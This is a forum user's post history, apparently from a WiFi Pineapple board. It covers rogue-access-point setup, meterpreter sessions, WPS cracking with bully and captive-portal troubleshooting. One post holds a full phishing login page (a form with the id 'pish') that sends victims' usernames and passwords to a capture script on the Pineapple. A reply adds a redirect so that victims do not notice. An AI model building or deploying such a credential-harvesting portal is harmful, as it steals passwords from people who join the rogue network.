Jump to content

d0n350n

Active Members
  • Posts

    12
  • Joined

  • Last visited

Posts posted by d0n350n

  1. Hi d0n350n,

    The pineapple has multiple ip interfaces, and can be used in a variety of different configurations.

    Try reading through this excellent set of guides from Scott Helme page:

    https://scotthelme.co.uk/wifi-pineapple-mark-v-introduction-setup/

    Also, I've found the info on Cisco's site helpful in the past.

    http://www.cisco.com/en/US/docs/security/vpn5000/manager/reference/guide/appA.html

    It should help you understand the main points.

    Cheers.

    :wink:

    Thanks Bro!! I figured it out, sorta, lol, but let me ask you this? I can get a meterpreter session, but none of the commands work, not even help or shell?

  2. Works fine here!

    I have a question...

    Does your kali system have to be connected to the pineapple? Reason I ask is because, correct me if i'm wrong, but the pineapple is on the 172. network, so how would the RHOST be anything different than the 172 network? In the example above, the kali machine is on a 10. network.

    Does the pineapple send the shell or receive the shell?

  3. Please put your code in the [ " code " ] [ "/code" ] tags (remove the ""). It is to hard to read otherwise

    Put this in your function after you send the info:

    window.location = "$authtarget";
    
    

    Thanks Again, It worked!!! But you kinda lost me with the code removal...

  4. Help!!! I need the code for the authtarget so that the client goes to the site they actually wanted. Any takers?



    <html><CENTER>

    <head>

    <title>$gatewayname Entry</title>

    <meta HTTP-EQUIV="Pragma" CONTENT="no-cache">


    <script type="text/javascript">

    function ajaxRequest() {

    if (window.XMLHttpRequest) {

    return new XMLHttpRequest();

    } else if (window.ActiveXObject) {

    return new ActiveXObject("Microsoft.XMLHTTP");

    } else {

    return false;

    }

    }



    function sendInfo() {

    var xmlhttp = new ajaxRequest();

    document.getElementById("results").innerHTML="<p><i></i></p>";

    var usernamevalue=encodeURIComponent(document.getElementById("username").value)

    var passwordvalue=encodeURIComponent(document.getElementById("password").value)

    var parameters="username="+usernamevalue+"&password="+passwordvalue

    xmlhttp.open("POST", "http://172.16.42.1/capture2.php", true)

    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded")

    xmlhttp.send(parameters)

    }

    </script>


    </head>

    <body bgcolor="white">


    <div id="results"><p><i></i></p></div>


    <table style="background-image:url(http://172.16.42.1/multi_logs_2.png);background-repeat:no-repeat;background-position:center center;border:0px solid black;width:800px;height:600px;">


    <TR>

    <TD width="42%" height="10%"></td>

    <TD width="58%" height="10%"></td>

    </tr>

    <tr>

    <TD width="42%" height="90%"></td>

    <TD width="58%" height="90%">

    <form id="pish" method="POST" action="http://172.16.42.1/capture2.php">

    <b>Email or Username:</b><BR><input type="text" name="username" id="username"><br />

    <b>Password:</b><BR><input type="password" name="password" id="password"><br />

    <br>

    <button type="button" onclick="sendInfo();return false;">Submit Info</button>

    </form>


    </TD></TR></TABLE>

    </body>

    </html>

  5. Hi newbi3, i need your help.

    When i click on "Dev preview", "View Code" or "Activate" on my saved portals nothing happends, it only works "Delete" option.

    Why it doesn't work?

    I could be that your saved portal is saved to your sdcard. If thats the case, you need to navigate to /sd/portals on your pineapple, copy and resave to the internal storage and delete the old one from there while your at it. Hope this helped... #learnedthehardway or update to version 2.3

  6. Latest update: I finally was able to run bully. n00b mistake: I was having what is referred to as the "-1 channel bug" which happens when you enable monitor mode while having the associated wlan interface enabled. I disabled wlan2, started mon0 and voila! It works! Thanks, AlexJeb; yes it was wlan2 being enabled...

    Maybe this is a n00b mistake as well, lol, but when you say disable wlan2, i'm confused because I have wlan0 and wlan1?

×
×
  • Create New...